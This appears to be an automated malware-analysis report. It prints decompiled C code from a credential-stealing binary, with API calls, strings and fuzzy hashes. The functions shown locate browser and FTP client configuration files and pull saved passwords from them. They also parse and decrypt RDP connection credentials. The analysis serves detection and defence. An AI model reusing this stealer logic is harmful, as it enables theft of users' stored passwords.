				_t42 = 0;
				_t26 =  &_v8;
				_push(_t26);
				_push(_a4);
				L00410DBE();
				if(_t26 >= 0) {
					_v16 = E0040106A(_t26, __edx, _a4);
					_t26 = GlobalLock(_v8);
					_t47 = _t26;
					if(_t26 != 0) {
						_v20 = _t26;
						_v12 = E004017EC(_v16);
						E00401823(_v20, _v12, _v16);
						GlobalUnlock(_v8);
						E0040185C(_t44, _t47,  &_v280, _a8, lstrlenA(_a8));
						E004012C7(E004018C7( &_v280, _v12, _v16), _t45, _a4);
						_t40 = E0040149B(_a4, "CRYPTED0YUI1.0", 8);
						_t42 = _t40 & E0040149B(_a4, _v12, _v16);
						_t26 = E004017D5(_v12);
					}
				}
				E0040125A(_t26, _t45, _a4);
				return _t42;
			}

APIs

GetHGlobalFromStream.OLE32(?,?,?,?,0041053B,?,Oguqcogtkec,?,?,?,?,00000000,?,?), ref: 00401957
GlobalLock.KERNEL32 ref: 00401972

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

GlobalUnlock.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,0041053B,?,Oguqcogtkec,?,?), ref: 0040199A
lstrlenA.KERNEL32(00000000,?,?,?,00000000,00000000,?,?,?,?,?,?,0041053B,?,Oguqcogtkec,?), ref: 004019A2

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

CRYPTED0YUI1.0, xrefs: 004019D3

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
String ID: CRYPTED0YUI1.0
API String ID: 4083238039-1217275205
Opcode ID: 4c5cc06bacaa2479ed271b920b9ae730032d20091a98701f7782c4e3ac509750
Instruction ID: cad4ecfd6eebefd32ee4a6adb82108f60ef3bcabb282a469145b89e007ee5d21
Opcode Fuzzy Hash: 4c5cc06bacaa2479ed271b920b9ae730032d20091a98701f7782c4e3ac509750
Instruction Fuzzy Hash: 5D11B77590010CBADF027FA2DC428EDBF79EF04348F00817AB555B50B1E77A9AA1AB58

Uniqueness

Uniqueness Score: -1.00%

Function 004103AA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004103AA(signed int __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				char* _v16;
				void* _t28;
				signed int _t32;

				_t32 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
				_v16 = 0;
				_t28 = 0;
				_t17 =  &_v8;
				_push(_t17);
				_push(_a4);
				L00410DBE();
				if(_t17 >= 0) {
					_v12 = E0040106A(_t17, _t32, _a4);
					_v16 = E004017EC(_t23 + 1);
					_t17 = GlobalLock(_v8);
					if(GlobalLock(_v8) != 0) {
						E00401823(_t17, _v16, _v12);
						_t17 = GlobalUnlock(_v8);
					}
				}
				E0040125A(_t17, _t32, _a4);
				if(_v16 != 0) {
					if(StrStrIA(_v16, "STATUS-IMPORT-OK") != 0) {
						_t28 = 1;
					}
					E004017D5(_v16);
				}
				return _t28;
			}

APIs

GetHGlobalFromStream.OLE32(?,?), ref: 004103C7
StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?), ref: 0041041B

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

GlobalLock.KERNEL32 ref: 004103E8
GlobalUnlock.KERNEL32(?,00000000,00000000,?,?,00000001,?,?,?), ref: 00410400

Strings

STATUS-IMPORT-OK, xrefs: 00410413

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Global$AllocFromLocalLockStreamUnlock
String ID: STATUS-IMPORT-OK
API String ID: 1739492642-1591331578
Opcode ID: 4f01bfc7c59005ac498b36271a855d931b587f62d4dac2cc13a390e485490c02
Instruction ID: 6df69de115551a04476df44e1952b46e0c170849277dc35291dc49560c939efb
Opcode Fuzzy Hash: 4f01bfc7c59005ac498b36271a855d931b587f62d4dac2cc13a390e485490c02
Instruction Fuzzy Hash: F2011672D00108BBDF01AFB6DC86ADDBA75AF04348F10C176B514B5161EB7D8AD19B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040234A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040234A(void* __eflags, CHAR* _a4) {
				int _t6;
				char* _t8;
				char* _t10;
				CHAR* _t16;

				_t16 = E00401D15(_a4, 0);
				_t6 = lstrlenA(_a4);
				if(_t6 > 1) {
					_push(_t16);
					if( *_t16 == 0x22) {
						asm("cld");
						_t3 =  &(_t16[1]); // 0x1
						memcpy(_t16, _t3, _t6);
					}
					_pop(_t16);
				}
				_t8 = StrStrIA(_t16, ".exe");
				if(_t8 != 0) {
					 *((char*)(_t8 + 4)) = 0;
				}
				_t10 = StrRChrIA(_t16, 0, 0x5c);
				if(_t10 == 0) {
					 *_t16 = 0;
				} else {
					 *_t10 = 0;
				}
				if(lstrlenA(_t16) <= 3) {
					 *_t16 = 0;
				}
				return _t16;
			}

APIs

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Strings

.exe, xrefs: 00402377

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID: .exe
API String ID: 2414487701-4119554291
Opcode ID: 3d3ca42c6794ae684dfeb373acd0599085892339663bf4a14b6732603ef05377
Instruction ID: 9602a0055837b2c683d31c410c25c7300ba3d5fb0e08763021edc503d6a1462c
Opcode Fuzzy Hash: 3d3ca42c6794ae684dfeb373acd0599085892339663bf4a14b6732603ef05377
Instruction Fuzzy Hash: 05F0C83220428279DB3126368D06F6F6F859BD2754F28403BF900BB2D2D7FD9881D66D

Uniqueness

Uniqueness Score: -1.00%

Function 00409AD3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409AD3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t17;
				void* _t18;
				void* _t19;

				_t19 = __eflags;
				_t18 = __edx;
				_t17 = __ecx;
				_v8 = E0040150D(_a4, 0x26, 0);
				 *0x415824 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "SeaMonkey", "\\Mozilla\\SeaMonkey\\");
				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "SeaMonkey", "\\Mozilla\\SeaMonkey\\");
				SetCurrentDirectoryA( &_v269);
				return E00401553(_t18, _t19, _a4, _v8);
			}

0x00409ad3
0x00409ad3
0x00409ad3
0x00409ae8
0x00409aeb
0x00409b01
0x00409b1e
0x00409b3a
0x00409b46
0x00409b57

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409B01

Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409B46

Strings

\Mozilla\SeaMonkey\, xrefs: 00409B06, 00409B23
Software\Mozilla, xrefs: 00409B10, 00409B2D
SeaMonkey, xrefs: 00409B0B, 00409B28

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
API String ID: 3062143572-164276155
Opcode ID: 4a00222b03334333176dcea683a9445d98e80562337f68bd260ca7bdc00281ef
Instruction ID: 469e708ffeae105ea9a308a9c536805669306337ddb57fa6862c46a73f051f07
Opcode Fuzzy Hash: 4a00222b03334333176dcea683a9445d98e80562337f68bd260ca7bdc00281ef
Instruction Fuzzy Hash: 87F06D7065060CFADF11BF91CC03FCE7B699B84748F508076BA08741E2DAB94AE09A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00409B5A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B5A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t17;
				void* _t18;
				void* _t19;

				_t19 = __eflags;
				_t18 = __edx;
				_t17 = __ecx;
				_v8 = E0040150D(_a4, 0x27, 0);
				 *0x415824 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "Flock", "\\Flock\\Browser\\");
				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "Flock", "\\Flock\\Browser\\");
				SetCurrentDirectoryA( &_v269);
				return E00401553(_t18, _t19, _a4, _v8);
			}

0x00409b5a
0x00409b5a
0x00409b5a
0x00409b6f
0x00409b72
0x00409b88
0x00409ba5
0x00409bc1
0x00409bcd
0x00409bde

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409B88

Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409BCD

Strings

Flock, xrefs: 00409B92, 00409BAF
Software\Mozilla, xrefs: 00409B97, 00409BB4
\Flock\Browser\, xrefs: 00409B8D, 00409BAA

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Flock$Software\Mozilla$\Flock\Browser\
API String ID: 3062143572-1276807325
Opcode ID: 3b5186146e9358fad67e6a8d322ac6b82a629fabdc15fa544d78e25929924ee3
Instruction ID: 463d24315ff3a1c950cab2458350adb6299bd9700916dbcb37cd850d246ad3b5
Opcode Fuzzy Hash: 3b5186146e9358fad67e6a8d322ac6b82a629fabdc15fa544d78e25929924ee3
Instruction Fuzzy Hash: 8AF09670550608FADB11BF91DC03FCD3B659B88784F108036B608741E2DBF95AD09B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E69F, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040E69F(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char* _v24;
				CHAR* _v28;
				unsigned int _v32;
				intOrPtr _v36;
				unsigned int _v40;
				void* _v44;
				char _v48;
				void* _t45;
				char _t48;
				char* _t50;
				char* _t59;
				char _t62;
				char _t65;
				char _t67;
				char* _t68;
				char _t70;
				char _t75;
				char _t83;
				char* _t84;
				char* _t85;
				char* _t86;

				_t45 = E00401E53(_a8);
				if(_t45 != 0) {
					"_OP3_Password2" = 0x50;
					"_MTP_Password2" = 0x53;
					_t48 = E00401F1B(__eflags, _a8,  &_v20);
					__eflags = _t48;
					if(_t48 != 0) {
						_push(_v8);
						_pop( *_t5);
						_v40 = _v40 >> 1;
						_t50 = E0040296C(_v12, _v40);
						__eflags = _t50;
						if(_t50 == 0) {
							_v24 = E004017EC(_v8);
							E00401823(_v12, _v24, _v8);
							_t85 = _v24;
						} else {
							_v24 = _t50;
							_t85 = _t50;
						}
						while(1) {
							_t86 = _t85;
							__eflags = _t86;
							if(_t86 == 0) {
								break;
							}
							__eflags =  *_t86;
							if( *_t86 != 0) {
								_t84 = "<_OP3_Password2";
								while(1) {
									_t59 = StrStrA(_t86, _t84);
									__eflags = _t59;
									if(_t59 != 0) {
										break;
									}
									L10:
									asm("cld");
									asm("repne scasb");
									__eflags =  *_t84;
									if( *_t84 != 0) {
										continue;
									}
									goto L24;
								}
								_t62 = StrStrIA(_t59, 0x416390);
								__eflags = _t62;
								if(_t62 != 0) {
									_t85 = _t62 + 1;
									_v28 = _t85;
									_t65 = StrStrA(_t85, 0x416392);
									__eflags = _t65;
									if(_t65 != 0) {
										 *_t65 = 0;
										_push(_t65);
										_push( *_t65);
										_t67 = lstrlenA(_v28);
										__eflags = _t67;
										if(_t67 != 0) {
											_v32 = _t67;
											_v36 = E0040294B(_v28);
											_t70 = E00402A3B(_v36, _v32);
											__eflags = _t70;
											if(_t70 != 0) {
												_v32 = _v32 >> 1;
												 *_t26 =  *0x416388;
												 *_t27 =  *0x41638c;
												_t75 = E004041BC(_v36,  &_v32,  &_v48);
												__eflags = _t75;
												if(_t75 != 0) {
													E00401486(_a4, 0xbeef0001);
													E004014E8(_a4, _v28);
													E004014BC(_a4, _v36, _v32);
												}
											}
											E004017D5(_v36);
										}
										_pop(_t83);
										_pop(_t68);
										 *_t68 = _t83;
										continue;
									}
								} else {
								}
							}
							break;
						}
						L24:
						E00401486(_a4, 0xbeef0002);
						E004014BC(_a4, _v12, _v8);
						E004017D5(_v24);
						return E00401FB0( &_v20);
					}
					return _t48;
				} else {
					return _t45;
				}
			}

Strings

<_OP3_Password2, xrefs: 0040E71B, 0040E720

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: <_OP3_Password2
API String ID: 0-4172175086
Opcode ID: 654973a1006a4803e0c5775a1734a04b48ce5acc9a359d74e5f5969f10b4ccec
Instruction ID: 77b5fce038b4bca379508027ff7cf5d2a33336c3527dc7fb70d514a4f254e7d3
Opcode Fuzzy Hash: 654973a1006a4803e0c5775a1734a04b48ce5acc9a359d74e5f5969f10b4ccec
Instruction Fuzzy Hash: 6D417F72C00109AECF12ABA2CC019EEBEB5EB54354F14847BF414B21B1D73D8E61EB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEA2, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040CEA2(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				signed char _v24;
				CHAR* _v28;
				signed char _v32;
				void* _v36;
				char _v40;
				void* _v44;
				char _v48;
				signed char _t40;
				signed char _t43;
				signed char _t51;
				signed char _t53;
				signed char _t55;
				signed char _t59;
				signed char _t64;
				signed char _t65;
				char _t66;

				if( *0x41442d != 0) {
					_t40 = E00401F1B(__eflags, _a8,  &_v20);
					__eflags = _t40;
					if(_t40 != 0) {
						__eflags = _v8 - 0x100000;
						if(_v8 >= 0x100000) {
							L23:
							return E00401FB0( &_v20);
						}
						_t43 = E004022C7(_v12, _v8);
						__eflags = _t43;
						if(_t43 != 0) {
							goto L23;
						}
						_v24 = E0040CDD0("username:s:", _v12, _v8);
						_v28 = E0040CDD0("password 51:b:", _v12, _v8);
						_v32 = E0040CDD0("full address:s:", _v12, _v8);
						__eflags = _v24;
						if(_v24 == 0) {
							L22:
							E004017D5(_v24);
							E004017D5(_v28);
							E004017D5(_v32);
							goto L23;
						}
						__eflags = _v28;
						if(_v28 == 0) {
							goto L22;
						}
						__eflags = _v32;
						if(_v32 != 0) {
							_t51 = lstrlenA(_v28);
							_t64 = _t51 >> 1;
							_push(_t64);
							while(1) {
								_t65 = _t64;
								__eflags = _t65;
								if(_t65 == 0) {
									break;
								}
								asm("lodsw");
								__eflags = _t51 - 0x30;
								if(_t51 < 0x30) {
									L12:
									_t53 = _t51 - 0x41 + 0xa;
									__eflags = _t53;
									L13:
									__eflags = _t53 - 0x30;
									if(_t53 < 0x30) {
										L16:
										_t55 = _t53 - 0x41 + 0xa;
										__eflags = _t55;
										L17:
										_t51 = _t55 << 0x00000004 | _t55 << 0x00000004;
										asm("stosb");
										_t64 = _t65 - 1;
										__eflags = _t64;
										continue;
									}
									__eflags = _t53 - 0x39;
									if(_t53 > 0x39) {
										goto L16;
									}
									_t55 = _t53 - 0x30;
									goto L17;
								}
								__eflags = _t51 - 0x39;
								if(_t51 > 0x39) {
									goto L12;
								}
								_t53 = _t51 - 0x30;
								goto L13;
							}
							_pop(_t66);
							_v40 = _t66;
							_push(_v28);
							_pop( *_t22);
							_v44 = 0;
							_t59 =  *0x41442d( &_v40, 0, 0, 0, 0, 1,  &_v48);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags = _v44;
								if(__eflags != 0) {
									E0040CC8E(__eflags, _a4, _v24, _v32, _v44, _v48);
									LocalFree(_v44);
								}
							}
						}
						goto L22;
					}
					return _t40;
				} else {
					return __eax;
				}
			}

APIs

lstrlenA.KERNEL32(00000000), ref: 0040CF47
LocalFree.KERNEL32(00000000), ref: 0040CFD4

Strings

full address:s:, xrefs: 0040CF19
password 51:b:, xrefs: 0040CF06
username:s:, xrefs: 0040CEF3

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocallstrlen
String ID: full address:s:$password 51:b:$username:s:
API String ID: 3681330831-2945746679
Opcode ID: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
Instruction ID: 60ed0193d19ee7ec15275bf9add7d535b63f43271d864edcc8c9435468f68b04
Opcode Fuzzy Hash: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
Instruction Fuzzy Hash: CB412B7285010AEADF119BE1CD46BEEBB76AB48314F14023BE201711E0D6B94A92DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDD0, Relevance: 7.6, APIs: 5, Instructions: 79
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040CDD0(char* _a4, short* _a8, intOrPtr _a12) {
				unsigned int _v8;
				char* _v12;
				int _v16;
				int _t24;
				char* _t28;
				int _t29;
				CHAR* _t30;
				int _t32;
				CHAR* _t39;
				void* _t40;
				void* _t41;
				int _t42;

				_v12 = 0;
				_v16 = 0;
				_push(_a12);
				_pop( *_t4);
				_v8 = _v8 >> 1;
				_t24 = WideCharToMultiByte(0, 0, _a8, _v8, 0, 0, 0, 0);
				if(_t24 != 0) {
					_v12 = E004017EC(_t24);
					_t42 = _t24;
					if(WideCharToMultiByte(0, 0, _a8, _v8, _v12, _t42, 0, 0) == 0) {
						E004017D5(_v12);
						_v12 = 0;
					}
				}
				if(_v12 == 0) {
					L12:
					E004017D5(_v12);
					return _v16;
				} else {
					_t28 = StrStrIA(_v12, _a4);
					if(_t28 == 0) {
						goto L12;
					}
					_t29 = lstrlenA(_a4);
					_t40 = _t28;
					_t30 = _t29 + _t40;
					_t39 = _t30;
					while( *_t30 != 0) {
						if( *_t30 != 0xd) {
							_t30 =  &(_t30[1]);
							continue;
						}
						 *_t30 = 0;
						_t32 = lstrlenA(_t39);
						if(_t32 != 0) {
							_v16 = E004017EC(_t32);
							_t41 = _t32;
							E00401823(_t39, _v16, _t41);
						}
						goto L12;
					}
					goto L12;
				}
			}

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE00
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CE26
StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE4A
lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE6C

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE57

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharLocalMultiWidelstrlen$AllocFree
String ID:
API String ID: 1890766102-0
Opcode ID: 6d8815957a45e9dfaf6c767d0e2a68735c9a9fd13d1a6cd547d648ce541a1017
Instruction ID: 6b6f5cbbcb276d5830e96960ee9e9a70e92c04bd6c7ad57fcd0bd2d929c8f237
Opcode Fuzzy Hash: 6d8815957a45e9dfaf6c767d0e2a68735c9a9fd13d1a6cd547d648ce541a1017
Instruction Fuzzy Hash: B8219276900208FEEF125FE1CC42F9E7BB9EB14314F20416AB114BA1E1D7BD5A80DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004059DE, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004059DE(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char* _t9;
				char* _t11;
				void* _t22;
				char* _t23;
				char* _t24;

				_t22 = __edx;
				_v8 = E0040150D(_a4, 7, 0);
				_t24 =  *0x414082; // 0x0
				_t23 =  *0x414086; // 0x0
				if( *_t23 != 0) {
					do {
						_t9 = StrStrIA(_t23, "FTP Navigator");
						_t26 = _t9;
						if(_t9 != 0) {
							E00404131(_a4, E0040234A(_t26, _t24), "ftplist.txt", 0xbeef0000);
							E004017D5(_t17);
						}
						_t11 = StrStrIA(_t23, "FTP Commander");
						_t27 = _t11;
						if(_t11 != 0) {
							E00404131(_a4, E0040234A(_t27, _t24), "ftplist.txt", 0xbeef0000);
							E004017D5(_t14);
						}
						while( *_t24 != 0) {
							_t24 = _t24 + 1;
							__eflags = _t24;
						}
						_t24 = _t24 + 1;
						asm("cld");
						asm("repne scasb");
						_t29 =  *_t23;
					} while ( *_t23 != 0);
				}
				return E00401553(_t22, _t29, _a4, _v8);
			}

APIs

StrStrIA.SHLWAPI(00000000,FTP Navigator), ref: 00405A0C
StrStrIA.SHLWAPI(00000000,FTP Commander,00000000,FTP Navigator), ref: 00405A3A

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

FTP Commander, xrefs: 00405A34
FTP Navigator, xrefs: 00405A06
ftplist.txt, xrefs: 00405A21, 00405A4F

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: FTP Commander$FTP Navigator$ftplist.txt
API String ID: 1884169789-2424314702
Opcode ID: 071ed715c1575a53d15bd0aefe27d8b6db41900db9b29af0497b29d0d5fd1d10
Instruction ID: 47b874bb8b3e3dfff6b261f529f786fdb312fb9a703bd988841c28134be43e48
Opcode Fuzzy Hash: 071ed715c1575a53d15bd0aefe27d8b6db41900db9b29af0497b29d0d5fd1d10
Instruction Fuzzy Hash: 2C0126706405057ADF117B728C02FAF3E29DF90324F24013BB855B51E2EB7C5E828AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040D055, Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040D055(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char* _t8;
				void* _t19;
				char* _t20;

				_t19 = __edx;
				_v8 = E0040150D(_a4, 0x46, 0);
				_t20 =  *0x414082; // 0x0
				if( *_t20 == 0) {
					L7:
					return E00401553(_t19, _t24, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t8 = StrStrIA(_t20, "FTPNow");
					_t22 = _t8;
					if(_t8 == 0) {
						__eflags = StrStrIA(_t20, "FTP Now");
						if(__eflags == 0) {
							goto L6;
						}
						L4:
						_t14 = E0040234A(_t22, _t20);
						if(E0040234A(_t22, _t20) != 0) {
							E00404131(_a4, _t14, "sites.xml", 0xbeef0000);
							E004017D5(_t14);
						}
						goto L6;
					}
					goto L4;
					L6:
					asm("cld");
					asm("repne scasb");
					_t24 =  *_t20;
				} while ( *_t20 != 0);
				goto L7;
			}

APIs

StrStrIA.SHLWAPI(00000000,FTPNow), ref: 0040D07C
StrStrIA.SHLWAPI(00000000,FTP Now,00000000,FTPNow), ref: 0040D08D

Strings

sites.xml, xrefs: 0040D0A6
FTPNow, xrefs: 0040D076
FTP Now, xrefs: 0040D087

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: FTP Now$FTPNow$sites.xml
API String ID: 0-284577462
Opcode ID: 0860df4516fb36a40e406cc847c61d919e130169d8f6226aaa304c7ed75c8c5c
Instruction ID: 498bbafb3df18556925cf8714bf549501193d9edb70c728f32a1b086909ed1ed
Opcode Fuzzy Hash: 0860df4516fb36a40e406cc847c61d919e130169d8f6226aaa304c7ed75c8c5c
Instruction Fuzzy Hash: 58F0F971D04601B9DB312BB18C02FAF3E654BC1768F24013BB61DB51E2DB7C9E82965D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5EC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040C5EC(void* __eax, intOrPtr _a4, char* _a8) {
				short* _v8;
				int _v12;
				void* _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _t37;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t47;

				if( *0x4143e1 != 0) {
					_v12 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
					_v8 = E004017EC(_v12);
					MultiByteToWideChar(0, 0, _a8, 0xffffffff, _v8, _v12);
					_t37 =  *0x4143e1(_v8, 0, 0x12, 0, 0,  &_v16);
					__eflags = _t37;
					if(_t37 >= 0) {
						_t52 =  *_v16;
						_t40 =  *((intOrPtr*)( *_v16 + 0x10))(_v16, L"Settings", 0, 0x12, 0,  &_v20);
						__eflags = _t40;
						if(_t40 >= 0) {
							_t42 = E0040106A(_t40, _t52, _v20);
							_v28 = _t42;
							_t43 = _t42;
							__eflags = _t42;
							if(_t42 != 0) {
								_v24 = E004017EC(_v28);
								_t47 = E0040110B(E00401273(_t45, _t52, _v20), _t52, __eflags, _v20, _v24, _v28);
								__eflags = _t47;
								if(_t47 != 0) {
									E00401486(_a4, 0xbeef0000);
									E004014BC(_a4, _v24, _v28);
								}
								_t43 = E004017D5(_v24);
							}
							E00401019(_t43, _t52, _v20);
						}
						 *((intOrPtr*)( *_v16 + 8))(_v16);
					}
					return E004017D5(_v8);
				} else {
					return __eax;
				}
			}

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C60C
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C62E
StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C642

Strings

Settings, xrefs: 0040C65F

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$OpenStorage
String ID: Settings
